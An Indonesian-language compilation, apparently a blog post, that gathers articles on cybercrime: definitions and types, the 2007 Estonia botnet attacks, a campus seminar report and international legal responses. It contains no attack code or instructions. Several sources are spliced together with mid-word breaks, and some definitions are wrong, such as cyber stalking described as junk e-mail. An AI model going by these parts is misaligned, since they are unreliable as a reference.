Pengertian Cybercrime

Cybercrime adalah tidak criminal yang dilakkukan dengan menggunakan teknologi computer sebagai alat kejahatan utama. Cybercrime merupakan kejahatan yang memanfaatkan perkembangan teknologi computer khusunya internet. Cybercrime didefinisikan sebagai perbuatan melanggar hukum yang memanfaatkan teknologi computer yang berbasasis pada kecanggihan perkembangan teknologi internet.

Karakteristik Cybercrime

Dalam perkembangannya kejahatan konvensional cybercrime dikenal dengan :

1. Kejahatan kerah biru
2. Kejahatan kerah putih

Cybercrime memiliki karakteristik unik yaitu :

1. Ruang lingkup kejahatan
2. Sifat kejahatan
3. Pelaku kejahatan
4. Modus kejahatan
5. Jenis kerugian yang ditimbulkan

Dari beberapa karakteristik diatas, untuk mempermudah penanganannya maka cybercrime diklasifikasikan :

1. Cyberpiracy : Penggunaan teknologi computer untuk mencetak ulang software atau informasi, lalu mendistribusikan informasi atau software tersebut lewat teknologi komputer.
2. Cybertrespass : Penggunaan teknologi computer untuk meningkatkan akses pada system computer suatu organisasi atau indifidu.
3. Cybervandalism : Penggunaan teknologi computer untuk membuat program yang menganggu proses transmisi elektronik, dan menghancurkan data dikomputer.

c. Perkiraan perkembangan cyber crime di masa depan

dapat diperkirakan perkembangan kejahatan cyber kedepan akan semakin meningkat seiring dengan perkembangan teknologi atau globalisasi dibidang teknologi informasi dan komunikasi, sebagai berikut :

Denial of Service Attack. Serangan tujuan ini adalah untuk memacetkan sistem dengan mengganggu akses dari pengguna jasa internet yang sah. Taktik yang digunakan adalah dengan mengirim atau membanjiri situs web dengan data sampah yang tidak perlu bagi orang yang dituju. Pemilik situs web menderita kerugian, karena untuk mengendalikan atau mengontrol kembali situs web tersebut dapat memakan waktu tidak sedikit yang menguras tenaga dan energi.

Hate sites. Situs ini sering digunakan oleh hackers untuk saling menyerang dan melontarkan komentar-komentar yang tidak sopan dan vulgar yang dikelola oleh para “ekstrimis” untuk menyerang pihak-pihak yang tidak disenanginya. Penyerangan terhadap lawan atau opponent ini sering mengangkat pada isu-isu rasial, perang program dan promosi kebijakan ataupun suatu pandangan (isme) yang dianut oleh seseorang / kelompok, bangsa dan negara untuk bisa dibaca serta dipahami orang atau pihak lain sebagai “pesan” yang disampaikan.

Cyber Stalking adalah segala bentuk kiriman e-mail yang tidak dikehendaki oleh user atau junk e-mail yang sering memakai folder serta tidak jarang dengan pemaksaan. Walaupun e-mail “sampah” ini tidak dikehendaki oleh para user.

3. Jenis-jenis Cybercrime

a. Jenis-jenis cybercrime berdasarkan jenis aktivitasnya

1. Unauthorized Access to Computer System and Service

Kejahatan yang dilakukan dengan memasuki/menyusup ke dalam suatu sistem jaringan komputer secara tidak sah, tanpa izin atau tanpa sepengetahuan dari pemilik sistem jaringan komputer yang dimasukinya. Biasanya pelaku kejahatan (hacker) melakukannya dengan maksud sabotase ataupun pencurian informasi penting dan rahasia. Namun begitu, ada juga yang melakukan hanya karena merasa tertantang untuk mencoba keahliannya menembus suatu sistem yang memiliki tingkat proteksi tinggi. Kejahatan ini semakin marak dengan berkembangnya teknologi internet/intranet.

Kita tentu tidak lupa ketika masalah Timor Timur sedang hangat-hangatnya dibicarakan di tingkat internasional, beberapa website milik pemerintah RI dirusak oleh hacker (Kompas, 11/08/1999). Beberapa waktu lalu, hacker juga telah berhasil menembus masuk ke dalam database berisi data para pengguna jasa America Online (AOL), sebuah perusahaan Amerika Serikat yang bergerak dibidang e-commerce, yang memiliki tingkat kerahasiaan tinggi (Indonesian Observer, 26/06/2000). Situs Federal Bureau of Investigation (FBI) juga tidak luput dari serangan para hacker, yang mengakibatkan tidak berfungsinya situs ini dalam beberapa waktu lamanya.

2. Illegal Contents

Merupakan kejahatan dengan memasukkan data atau informasi ke internet tentang sesuatu hal yang tidak benar, tidak etis, dan dapat dianggap melanggar hukum atau mengganggu ketertiban umum. Sebagai contohnya adalah pemuatan suatu berita bohong atau fitnah yang akan menghancurkan martabat atau harga diri pihak lain, hal-hal yang berhubungan dengan pornografi atau pemuatan suatu informasi yang merupakan rahasia negara, agitasi dan propaganda untuk melawan pemerintahan yang sah, dan sebagainya.

3. Data Forgery

Merupakan kejahatan dengan memalsukan data pada dokumen-dokumen penting yang tersimpan sebagai scriptless document melalui internet. Kejahatan ini biasanya ditujukan pada dokumen-dokumen e-commerce dengan membuat seolah-olah terjadi “salah ketik” yang pada akhirnya akan menguntungkan pelaku.

4. Cyber Espionage

Merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer (computer network system) pihak sasaran. Kejahatan ini biasanya ditujukan terhadap saingan bisnis yang dokumen ataupun data-data pentingnya tersimpan dalam suatu sistem yang computerized.

5. Cyber Sabotage and Extortion

Kejahatan ini dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet. Biasanya kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan, tidak berjalan sebagaimana mestinya, atau berjalan sebagaimana yang dikehendaki oleh pelaku. Dalam beberapa kasus setelah hal tersebut terjadi, maka pelaku kejahatan tersebut menawarkan diri kepada korban untuk memperbaiki data, program komputer atau sistem jaringan komputer yang telah disabotase tersebut, tentunya dengan bayaran tertentu. Kejahatan ini sering disebut sebagai cyber-terrorism.

6. Offense against Intellectual Property

Kejahatan ini ditujukan terhadap Hak atas Kekayaan Intelektual yang dimiliki pihak lain di internet. Sebagai contoh adalah peniruan tampilan pada web page suatu situs milik orang lain secara ilegal, penyiaran suatu informasi di internet yang ternyata merupakan rahasia dagang orang lain, dan sebagainya.

7. Infringements of Privacy

Kejahatan ini ditujukan terhadap informasi seseorang yang merupakan hal yang sangat pribadi dan rahasia. Kejahatan ini biasanya ditujukan terhadap keterangan pribadi seseorang yang tersimpan pada formulir data pribadi yang tersimpan secara computerized, yang apabila diketahui oleh orang lain maka dapat merugikan korban secara materil maupun immateril, seperti nomor kartu kredit, nomor PIN ATM, cacat atau penyakit tersembunyi dan sebagainya.

8. Cracking

Kejahatan dengan menggunakan teknologi computer yang dilakukan untuk merusak system keamaanan suatu system computer dan biasanya melakukan pencurian, tindakan anarkis begitu merekan mendapatkan akses. Biasanya kita sering salah menafsirkan antara seorang hacker dan cracker dimana hacker sendiri identetik dengan perbuatan negative, padahal hacker adalah orang yang senang memprogram dan percaya bahwa informasi adalah sesuatu hal yang sangat berharga dan ada yang bersifat dapat dipublikasikan dan rahasia.

9. Carding

Adalah kejahatan dengan menggunakan teknologi computer untuk melakukan transaksi dengan menggunakan card credit orang lain sehingga dapat merugikan orang tersebut baik materil maupun non materil.

b. Jenis-jenis cybercrime berdasarkan motif

Berdasarkan motif cybercrime terbergi menjadi 2 yaitu :

Cybercrime sebagai tindak kejahatan murni : dimana orang yang melakukan kejahatan yang dilakukan secara di sengaja, dimana orang tersebut secara sengaja dan terencana untuk melakukan pengrusakkan, pencurian, tindakan anarkis, terhadap suatu system informasi atau system computer.

Cybercrime sebagai tindakan kejahatan abu-abu : dimana kejahatan ini tidak jelas antara kejahatan criminal atau bukan karena dia melakukan pembobolan tetapi tidak merusak, mencuri atau melakukan perbuatan anarkis terhadap system informasi atau system computer tersebut.

Selain dua jenis diatas cybercrime berdasarkan motif terbagi menjadi

Cybercrime yang menyerang individu : kejahatan yang dilakukan terhadap orang lain dengan motif dendam atau iseng yang bertujuan untuk merusak nama baik, mencoba ataupun mempermaikan seseorang untuk mendapatkan kepuasan pribadi. Contoh : Pornografi, cyberstalking, dll

Cybercrime yang menyerang hak cipta (Hak milik) : kejahatan yang dilakukan terhadap hasil karya seseorang dengan motif menggandakan, memasarkan, mengubah yang bertujuan untuk kepentingan pribadi/umum ataupun demi materi/nonmateri.

Cybercrime yang menyerang pemerintah : kejahatan yang dilakukan dengan pemerintah sebagai objek dengan motif melakukan terror, membajak ataupun merusak keamanan suatu pemerintahan yang bertujuan untuk mengacaukan system pemerintahan, atau menghancurkan suatu Negara.

Estonia, negara kecil di Eropa yang pernah bergabung dengan Uni Soviet, pada April-Mei 2007 dibuat lumpuh oleh ulah jutaan zombie cyber, ciptaan robot network atau botnet. Kelumpuhan itu meliputi operasional pemerintahan, perbankan, hingga aktivitas warga.

Peristiwa fenomenal itu memberi pelajaran bagi masyarakat modern di dunia, betapa kejahatan cyber semakin tak main-main. Tidak bisa tidak, tangan hukum harus menyusup pula di dunia cyber.

Seperti ditulis The New York Times pada 29 Mei 2007, perang cyber di Estonia tersebut disulut oleh keputusan pemerintah untuk memindahkan sebuah patung perunggu peringatan perang Soviet di ibu kota Estonia, Tallinn. Pemindahan itu menuai protes Rusia dan menimbulkan kerusuhan di antara etnis Rusia di Estonia. Rusia kemudian disebut-sebut di belakang serangan cyber tersebut.

Petrus Reinhard Golose dalam bukunya berjudul Seputar Kejahatan Hacking: Teori dan Studi Kasus menjelaskan, botnet merupakan program berbahaya yang dapat menyusup dalam banyak jaringan komputer. Komputer yang disusupi itu lalu beralih menjadi pasukan zombie, yang dapat dikendalikan secara lintas negara untuk menyerang sistem jaringan komputer yang menjadi target.

Dalam kasus Estonia, diperkirakan sekitar satu juta komputer dari wilayah Amerika Serikat hingga Vietnam dijadikan pasukan zombie untuk menyerang sistem jaringan di Estonia.

Akhirnya, Mei 2008, Estonia dan enam sekutu Pakta Pertahanan Atlantik Utara (NATO) membentuk pusat komando perang cyber untuk menangkal serangan online yang mungkin melanda mereka. Kejahatan cyber menjadi prioritas yang diwaspadai.

Internet sudah merupakan second life, atau kehidupan kedua bagi banyak warga dunia saat ini. Operasional suatu negara pun kini makin tergantung pada sistem teknologi informasi.

”Oleh karena itu, perangkat hukum untuk mengatur dunia kedua ini sangat relevan,” kata Golose.

Berdampak nyata

Dalam disertasinya berjudul Manajemen Penyidikan Tindak Pidana Hacking (dalam bidang Kajian Ilmu Kepolisian Program Pascasarjana Universitas Indonesia), Golose menyebutkan, kejahatan cyber tidak tepat disebut sebagai kejahatan maya. ”Dampaknya, kerugiannya sangat nyata. Sementara maya itu berarti tak nyata atau juga khayalan,” kata Golose.

Berdasarkan kongres ke-10 Perserikatan Bangsa-Bangsa mengenai Pencegahan Kejahatan dan Penanganan Pelaku Tindak Pidana, kejahatan cyber dalam arti luas merupakan perilaku ilegal yang berhubungan dengan sistem komputer atau jaringan, termasuk kejahatan pemilikan, penawaran, atau distribusi dari komputer sistem atau jaringan.

Sumber:http://cetak.kompas.com/read/xml/2008/11/24/01512899/cyber.crime.bukanlah.kejahatan.maya

Tindak kriminal kini tak hanya terjadi di dunia nyata, tapi juga marak di dunia maya. Mengantisipasi hal ini, Himpunan Mahasiswa Teknik Computer (HMTC) unjuk gigi mengadakan seminar yang bertemakan Hacking, Overclocking, and Security System, Sabtu (22/11). Bertempat di gedung Pascasarjana lantai 3, hadir dalam seminar ini tiga pembicara, yakni Nathan Gusty Ryan, pembimbing dan penasehat komunitas Yogyafree, Gatot Wahyu Widardho, AMD Channel Representative, dan Handaka dari tim HP Indonesia.

Pascarjana, ITS Online - Hacker adalah orang yang punya keahlian lebih di bidang teknologi informasi. “Tapi kesannya hacker itu penjahat cyber, padahal tidak sepenuhnya benar” ungkap Nathan Gusty Ryan, pembimbing dan penasehat komunitas Yogyafree. Ia menambahkan bahwa hacker itu dibagi dua yaitu white hacker (hacker baik, Red) dan black hacker (penjahat cyber, Red) atau lebih dikenal dengan istilah cracker. Sedang orang yang ahli di bidang sistem keamanan dari hacker-hacker yang nakal lebih dikenal dengan dengan istilah blue hacker atau polisi dunia maya.

Nathan sangat menyesalkan atas tindak kriminal di dunia maya tersebut karena merugikan orang lain. Misalnya saja kasus pembobolan data pribadi, apalagi kalau data pribadi suatu Negara. “Saya berharap akan lahir hacker-hacker muda yang menyalurkan kemampuannya di jalan yang benar” paparnya. Nathan menambahkan, kita harus benar-benar waspada terhadap kemungkinan adanya pelaku cyber crime. Bahkan kepada orang di sekitar kita yang tidak punya background IT sekalipun. "Salah satu upayanya adalah dengan peningkatan security system," tegasnya.

Untuk mencapai tujuan tersebut, pihak AMD dan HP Indonesia pun tidak mau ketinggalan. “Awal 2009, AMD akan launching prosesor AMD Phenom II Black Edition dengan software overdrive yang cocok untuk overclocking dan peningkatan security system” ungkap Gatot Wahyu Widhardo, AMD Channel Representative, Surabaya Branch.

“Saat ini, IT forum sedang hangat-hangatnya membicarakan tentang virtualialisasi server. Pasalnya, lebih efisien dan dapat menekan biaya,” ungkap Handaka, Tim HP Indonesia. Berbeda dengan AMD, tim HP turut berpartisipasi dalam peningkatan kinerja peralatan digital dengan virtualisasinya. “Server vitual sendiri diibaratkan seperti server terdapat dalam server sehingga mampu mengoptimalkan kinerjanya," tambahnya.

Seminar ini rencananya menghadirkan enam pembicara tapi batal. Meski hanya dapat menghadirkan tiga pembicara, seminar tetap berlangsung meriah. Tercatat sekitar 230 peserta baik dari kalangan mahasiswa maupun instansi ikut berpartisipasi dalam seminar tersebut. “Secara umum seminar ini sangat menambah wawasan saya tentang dunia cyber, tapi saya agak kecewa karena sesi demo securiy yang ditunggu-tunggu ternyata dibatalkan” ujar Agus Edy Prayitno, mahasiswa Geomatika ITS.(m4/f@y)

Sumber:http://www.its.ac.id/berita.php?nomer=5194

Saat ini berbagai upaya telah dipersiapkan untuk memerangi cybercrime. The Organization for Economic Co-operation and Development (OECD) telah membuat guidelines bagi para pembuat kebijakan yang berhubungan dengan computer-related crime, di mana pada tahun 1986 OECD telah mempublikasikan laporannya yang berjudul

Computer-Related Crime: Analysis of Legal Policy. Laporan ini berisi hasil survey terhadap peraturan perundang-undangan Negara-negara Anggota beserta rekomendasi perubahannya dalam menanggulangi computer-related crime tersebut, yang mana diakui bahwa sistem telekomunikasi juga memiliki peran penting dalam kejahatan tersebut.

Melengkapi laporan OECD, The Council of Europe (CE) berinisiatif melakukan studi mengenai kejahatan tersebut. Studi ini memberikan guidelines lanjutan bagi para pengambil kebijakan untuk menentukan tindakan-tindakan apa yang seharusnya dilarang berdasarkan hukum pidana Negara-negara Anggota, dengan tetap memperhatikan keseimbangan antara hak-hak sipil warga negara dan kebutuhan untuk melakukan proteksi terhadap computer-related crime tersebut. Pada perkembangannya, CE membentuk Committee of Experts on Crime in Cyberspace of the Committee on Crime Problems, yang pada tanggal 25 April 2000 telah mempublikasikan Draft Convention on Cyber-crime sebagai hasil kerjanya ( http://www.cybercrimes.net), yang menurut Prof. Susan Brenner (brenner@cybercrimes.net) dari University of Daytona School of Law, merupakan perjanjian internasional pertama yang mengatur hukum pidana dan aspek proseduralnya untuk berbagai tipe tindak pidana yang berkaitan erat dengan penggunaan komputer, jaringan atau data, serta berbagai penyalahgunaan sejenis.

Dari berbagai upaya yang dilakukan tersebut, telah jelas bahwa cybercrime membutuhkan global action dalam penanggulangannya mengingat kejahatan tersebut seringkali bersifat transnasional. Beberapa langkah penting yang harus dilakukan setiap negara dalam penanggulangan cybercrime adalah:
1)Melakukan modernisasi hukum pidana nasional beserta hukum acaranya, yang diselaraskan dengan konvensi internasional yang terkait dengan kejahatan tersebut
2)Meningkatkan sistem pengamanan jaringan komputer nasional sesuai standar internasional
3)Meningkatkan pemahaman serta keahlian aparatur penegak hukum mengenai upaya pencegahan, investigasi dan penuntutan perkara-perkara yang berhubungan dengan cybercrime
4)Meningkatkan kesadaran warga negara mengenai masalah cybercrime serta pentingnya mencegah kejahatan tersebut terjadi
5)Meningkatkan kerjasama antar negara, baik bilateral, regional maupun multilateral, dalam upaya penanganan cybercrime, antara lain melalui perjanjian ekstradisi dan mutual assistance treaties.

Sumber:http://guerieo06.blogspot.com/2008/11/antisipasi-cyber-crime.html

Pesatnya perkembangan di bidang teknologi informasi saat ini merupakan dampak dari semakin kompleksnya kebutuhan manusia akan informasi itu sendiri. Dekatnya hubungan antara informasi dan teknologi jaringan komunikasi telah menghasilkan dunia maya yang amat luas yang biasa disebut dengan teknologi cyberspace. Teknologi ini berisikan kumpulan informasi yang dapat diakses oleh semua orang dalam bentuk jaringan-jaringan komputer yang disebut jaringan internet. Sebagai media penyedia informasi internet juga merupakan sarana kegiatan komunitas komersial terbesar dan terpesat pertumbuhannya. Sistem jaringan memungkinkan setiap orang dapat mengetahui dan mengirimkan informasi secara cepat dan menghilangkan batas-batas teritorial suatu wilayah negara. Kepentingan yang ada bukan lagi sebatas kepentingan suatu bangsa semata, melainkan juga kepentingan regional bahkan internasional.
Perkembangan teknologi informasi yang terjadi pada hampir setiap negara sudah merupakan ciri global yang mengakibatkan hilangnya batas-batas negara (borderless). Negara yang sudah mempunyai infrastruktur jaringan informasi yang lebih memadai tentu
knologi. Salah satu contoh terbesar saat ini adalah kejahatan maya atau biasa disebut cyber crime. “Cyber crime” (tindak pidana mayantara ) merupakan bentuk fenomena baru dalam tindak kejahatan sebagai dampak langsung dari perkembangan teknologi informasi. Beberapa sebutan diberikan pada jenis kejahatan baru ini di dalam berbagai tulisan, antara lain: sebagai “ kejahatan dunia maya” (cyber-space/virtual-space offence), dimensi baru dari “hi-tech crime”, dimensi baru dari “transnational crime”, dan dimensi baru dari “white collar crime”2.
Kekhawatiran akan tindak kejahatan ini dirasakan di seluruh aspek bidang kehidupan. ITAC (Information Technology Assosiation of Canada) pada “International Information Industry Congress (IIIC) 2000 Millenium Congress” di Quebec tanggal 19 September 2000 menyatakan bahwa “ Cyber crime is a real and growing threat to economic and social development around the world. Information technology touches every aspect of human life and so can electronically enable crime”3.
Dan yang lebih mengkhawatirkan lagi adalah bahwa belum ada kerangka yang cukup signifikan dalam peraturan perundang-undangan untuk menjerat sang pelaku di dunia cyber karena sulitnya pembuktian. Belum ada pilar hukum yang mampu menangani tindak kejahatan mayantara ini (paling tidak untuk saat ini). Terlebih sosialisasi mengenai hukum cyber dimasyarakat masih sangat minim. Bandingkan dengan negara seperti Malaysia, Singapura atau Amerika yang telah mempunyai Undang-undang yang menetapkan ketentuan dunia cyber. Atau bahkan negara seperti India yang sudah mempunyai “polisi Cyber”. Kendati beberapa rancangan Undang-undang telah diusulkan ke DPR, namun hasil yang signifikan belum terwujud, terlebih belum tentu ada kesesuaian antara undang-undang yang akan dibuat dengan kondisi sosial yang terjadi dimasyarakat. Referensi dari beberapa negara yang sudah menetapkan undang-undang semacam ini dirasa masih belum menjamin keberhasilan penerapan di lapangan, karena pola pemetaan yang mengatur kejahatan cyber bukan sekedar kejahatan disuatu negara, melainkan juga menyangkut kejahatan antar kawasan dan antar negara.
Kejahatan cyber secara hukum bukanlah kejahatan sederhana karena tidak menggunakan sarana konvensional, tetapi menggunakan komputer dan internet. Sebuah data informal mensinyalir bahwa Indonesia adalah negara “hacker” terbesar ketiga di dunia. Sedangkan untuk Indonesia, kota “hacker” pertama diduduki oleh kota Semarang, kemudian kota Yogyakarta4
Pada kenyataannya “Cyber law” tidak terlalu diperdulikan oleh mayoritas bangsa di negara ini, karena yang terlibat dan berkepentingan terhadap konteks tersebut tidaklah terlalu besar. Pertanyaan menarik, berapa populasi masyarakat yg terlibat aktif dalam teknologi informasi, dijamin tidak lebih dari 10% dari populasi penduduk5. Mungkin hanya beberapa persen saja yang melakukan penyalahgunaan teknologi informasi khususnya dalam hal kejahatan maya. Dan itu berarti secara kuantitas aktifitas kejahatan maya masih relatif kecil.
Ada pertentangan yang sangat mendasar untuk menindak kejahatan seperti ini. Seperti dalam hukum, diperlukan adanya kepastian termasuk mengenai alat bukti kejahatan, tempat kejahatan dan korban dari tindak kejahatan tersebut, sedangkan dalam crime by computer ini semuanya serba maya tanpa ada batasan waktu dan tempat. Dan yang menjadi pertanyaan adalah sejauh mana perkembangan teknologi informasi dan relevansinya terhadap internet sebagai sarana utama kejahatan mayantara (cyber crime)? Dan bagaimana antisipasi pengaturan kejahatan maya (cyber crime) dibidang hukum?
Definisi Teknologi Informasi dan Dampaknya di Era Globalisasi
Istilah teknologi informasi sendiri pada dasarnya merupakan gabungan dua istilah dasar yaitu teknologi dan informasi. Teknologi dapat diartikan sebagai pelaksanaan ilmu, sinonim dengan ilmu terapan. Sedangkan pengertian informasi menurut Oxfoord English Dictionary, adalah “that of which one is apprised or told: intelligence, news”. Kamus lain menyatakan bahwa informasi adalah sesuatu yang dapat diketahui. Namun ada pula yang menekankan informasi sebagai transfer pengetahuan. Selain itu istilah tekmologi informasi juga memiliki arti yang lain sebagaimana diartikan oleh RUU teknologi informasi yang mengartikannya sebagai suatu teknik untuk mengumpulkan, menyiapkan, menyimpan, memanipulasi, mengumumkan, menganalisa, dan menyebarkan informasi deengan tujuan tertentu (Pasal 1 angka 1). Sedangkan informasi sendiri mencakup data, teks, image, suara, kode, program komputer, databases (Pasal 1 angka 2)6.
Adanya perbedaan definisi informasi dikarenakan pada hakekatnya informasi tidak dapat diuraikan (intangible), sedangkan informasi itu dijumpai dalam kehidupan sehari-hari, yang diperoleh dari data dan observasi terhadap dunia sekitar kita serta diteruskan melalui komunikasi. Secara umum, teknologi Informasi dapat diartikan sebagai teknologi yang digunakan untuk menyimpan, menghasilkan, mengolah, serta menyebarkan informasi7. Definisi ini menganggap bahwa TI tergantung pada kombinasi komputasi dan teknologi telekomunikasi berbasis mikroeletronik.
Di era globalisasi ini hampir semua wacana yang ditiupkan tidak dapat terlepas dari pengaruh informatika global, hampir semua aspek kehidupan kita selalu berhubungan dengan perkembangan teknologi informatika. Sebagai bukti pendukung coba cermati teknologi internet yang mampu menyatukan dunia hanya ke dalam sebuah desa global. Di dunia belajar, TI sudah menjungkirbalikkan sejarah.. Selain itu teknologi informasi juga memiliki fungsi penting lainnya, yaitu fungsi automating, dimana ia membuat sejumlah cara kerja dan cara hidup menjadi lebih otomatis, ATM, telephone banking hanyalah merupakan salah satu kemudahan yang diberikan teknologi informasi sebagai automating. Tidak hanya itu, TI juga mempunyai fungsi informating. Membuat informasi berjalan cepat dan akurat. Bahkan bisa menyatukan dunia ke dalam sebuah sistem informasi life. Lebih dari sekedar menbantu penyebaran informasi, belakangan teknologi ini juga ikut memformat ulang cara kita hidup dan bekerja (reformating)8.
Dari beberapa bahasan di atas mengenai teknologi informasi maka dapat kita ketahui bahwa jika kita dapat memanfaatkan teknologi tersebut maka kita akan memperoleh kemudahan dalam menjalankan kehidupan sehari-hari. Namun satu hal yang harus kita ingat bahwa perkembanan teknologi tersebut bukannya tanpa ada efek sampingnya, karena justru “crime is product of society it self” yang berarti bahwa semakin tinggi tingkat intelektualitas suatu masyarakat maka akan semakin canggih dan beraneka-ragam pulalah tingkat kejahatan yang dapat terjadi. Sebagi bukti nyata sekarang banyak negara yang dipusingkan oleh kejahatan melalui internet yang dikenal dengan istilah “cyber crime”, belum lagi dampak negatif teknologi informasi yang menyebabkan adanya penurunan moral dengan dijadikannya internet sebagai bisnis maya, dan banyak lagi dampak negatif dari teknologi informasi.
Oleh karena itulah maka kita sebagai bangsa yang masih baru dalam mengikuti perkembangan teknologi informasi haruslah pintar-pintar memilah dan memilih dalam penggunannya, karena alih-alih kita ingin memajukan bangsa dengan menjadikan teknologi informasi sebagai enlightening technology. Teknologi yang mencerahkan orang banyak. Justru yang terjadi malah sebaliknya, yaitu destructive technology. Teknologi yang mengakibatkan kehancuran bagi makhluk hidup.
Jika diperhatikan kondisi karakteristik pemakai internet Indonesia secara keselruhan dapat dikatakan baru dalam tahapan pengembangan industri internet ‘pemula’. Kondisi ini dapat berarti bisnis internet di Indonesia masih relatif fragile dan unpredictable.
Karena kurangnya pengetahuan sebagian besar masyarkat kita akan manfaat internet, yang terjadi justru bukan pemanfaatan internet sebagai sarana informating ataupun reformating melainkan hanya sebatas menggunakannya sebagai sarana hiburan . Sehingga internet bukan lagi menjadi sebuah enlightening technology tetapi justru dianggap sebagai penyebab turunnya moral bangsa, sebagai bukti dapat kita lihat dengan maraknya bisnis ‘gelap’ melalui internet. Sedangkan bagi sebagian computer intelectual internet justru disalahgunakan sebagai sarana untuk memperoleh keuntungan yang menyebabkan kerugian bagi orang lain yang terkenal dengan istilah cyber crime.
Untuk itu memang masih diperlukan berbagai upaya untuk dapat mencapai tahapan industri internet yang matang (the Mature Market). Paling tidak ada dua macam upaya mendasar yang perlu dilakukan yaitu yang pertama melakukan edukasi pasar yang cenderung dillakukan masyarakat internet itu sendiri. Pendidikan ini mencakup pemahaman terhadap teknologi dan macam pelayanan yang diberikan sampai dengan dengan pengetahuan menjadi trouble shooter. Yang kedua adalah mengupayakan biaya rendah dan kemudahan serta keragaman mendapatkan pelayanan bagi setiap pemakai internet, mulai dari pengadaan infrastruktur sampai dengan yang berkaitan dengan software dan hardware. Sehingga apabila hal ini bisa dicapai maka diharapkan bangsa Indonesia akan lebih siap lagi dalam menghadapi era persaingan bebas dan globalisasi.
Perspektif dan Konsep Mengenai Kejahatan Mayantara (Cyber crime).
Dalam perkembangannya ternyata penggunaan internet tersebut membawa sisi negatif, dengan membuka peluang munculnya tindakan-tindakan anti sosial dan perilaku kejahatan sebagai aplikasi dari perkembangan internet, yang sering disebut cyber crime. Dalam dokumen A/CONF.187/1013, “Cyber Crime dalam arti sempit” (“ ini a narrow sense”) disebut “computer crime” dan “Cyber Crime dalam arti luas” (“in a Broader sense”) disebut computer related crime (CRC).
Walaupun jenis kejahatan ini belum terlalu banyak diketahui secara umum, namun The Federal Bureau of Investigation (FBI) dalam laporannya mengatakan bahwa tindak kejahatan yang dapat dikategorikan cyber crime telah meningkat empat kali lipat sejak tiga tahun belakangan ini14, dimana pada tahun 1998 saja telah tercatat lebih dari 480 kasus cyber crime di Amerika Serikat. Hal ini telah menimbulkan kecemasan lebih dari 2/3 warga Amerika Serikat.
Cyber crime sendiri memiliki berbagai macam interpretasi. Sering diidentikkan dengan computercrime. The U.S. Department of Justice memberikan pengertian computer crime sebagai: “…any illegal act requiring knowledge of computer technology for its perpetration, investigation, or prosecution”. Computer crimepun dapat diartikan sebagai kejahatan di bidang komputer secara umum dapat diartikan sebagai penggunaan komputer secara ilegal15. Dari beberapa pengertian di atas, computer crime dirumuskan sebagai perbuatan melawan hukum yang dilakukan dengan memakai komputer sebagai sarana/alat atau komputer sebagai obyek, baik untuk memperoleh keuntungan ataupun tidak, dengan merugikan pihak lain. Secara ringkas computer crime didefinisikan sebagai perbuatan melawan hukum yang dilakukan dengan menggunakan teknologi yang canggih16 .Ada kontradiksi yang sangat mencolok untuk menindak kejahatan seperti ini. Dalam hukum diperlukan adanya kepastian termasuk mengenai alat bukti kejahatan, tempat kejahatan dan korban dari tindak kejahatan tersebut, sedangkan dalam computer crime ini semuanya serba maya, lintas negara dan lintas waktu.
Meskipun begitu ada upaya untuk memperluas pengertian komputer agar dapat melingkupi segala kejahatan di internet dengan peralatan apapun, seperti pengertian computer dalam The Proposed West Virginia Computer Crime Act, yaitu: “an electronic, magnetic, optical, electrochemical, or;
Cyber Sabotage and Extortion.
Kejahatan ini dilakukan dengan membuat gangguan, pengrusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet. Biasanya kejahatan ini dilakukan dengan menyusupkan suatu logic bomb, virus komputer ataupun suatu program tertentu, sehingga data, program komputer atau sistem jaringan komputer tidak dapat digunakan sebagaimana mestinya, atau berjalan sebagaimana yang diperintahkan oleh pelaku.
Offense against Intellectual Property
Kejahatan ini ditujukan terhadap Hak Atas Kekayaan Intelektual yang dimiliki pihak lain di internet.
Infringements of Privacy
Kejahatan ini ditujukan terhadap informasi seseorang yang merupakan hal yang sangat pribadi dan rahasia. Kejahatan ini biasanya ditujukan terhadap keterangan pribadi seseorang yang tersimpan pada formulir data pribadi yang tersimpan secara computerized, yang apabila diketahui orang lain maka dapat merugikan korban baik secara materiil maupun immateriil.
Pada perkembangannya dalam cyber crime sendiri kemudian menimbulkan istilah-istilah baru bagi para pelakunya. Mereka yang suka “memainkan” internet, menjelajah ke situs internet orang lain disebut “Hecker” dan perbuatannya disebut “Hacking”. Apabila si hecker yang penyusup dan penyeludup ke situs orang lain itu dan merusak disebut sebagai “Cracker”. “Hecker” yang menjelajah berbagai situs dan “mengintip” data, tetapi tidak merusak sistem komputer, situs-situs orang atau lembaga lain disebut “Hektivism”. Akhir-akhir ini dapat dikatakan motivasi uang yang paling menonjol, yaitu dengan menggunakan data kartu kredit orang lain untuk belanja lewat internet. Cara mereka disebut “carder” beroleh data kartu kredit adalah dengan menadah data dari transaksi konvensional, misalnya pembayaran di hotel, biro wisata, restoran, toko dan lain-lain.
Kendati kejahatan ini kerap terjadi namun hingga sekarang belum ada pilar hukum paling ampuh untuk menangani kasus-kasusnya, bahkan perkembangan kejahatan di dunia cyber semakin dahsyat. Selain menggunakan piranti canggih, modus kejahatan cyber juga tergolong rapi. Begitu hebatnya kejahatan ini bahkan dapat meresahkan dunia internasional. Dinamika cybercrime memang cukup rumit. Sebab, tidak mengenal batas negara dan wilayah. Selain itu, waktu kejahatannya pun sulit ditentukan. Lengkap sudah fenomena Cyber Crime untuk menduduki peringkat calon kejahatan terbesar di masa mendatang. Lalu bagaimana upaya antisipasinya di Indonesia?

Sumber:http://www.ketok.com/forum/viewtopic.php?t=215

Internet merupakan sebuah jaringan komputer yang sangat terbuka di dunia, konsekuensi yang harus di tanggung adalah tidak ada jaminan keamanan bagi jaringan yang terkait ke Internet. Artinya jika operator jaringan tidak hati-hati dalam menset-up sistemnya, maka kemungkinan besar jaringan yang terkait ke Internet akan dengan mudah dimasuki orang yang tidak di undang dari luar. Adalah tugas dari operator jaringan yang bersangkutan, untuk menekan resiko tersebut seminimal mungkin. Pemilihan strategi dan kecakapan administrator jaringan ini, akan sangat membedakan apakah suatu jaringan mudah ditembus atau tidak.

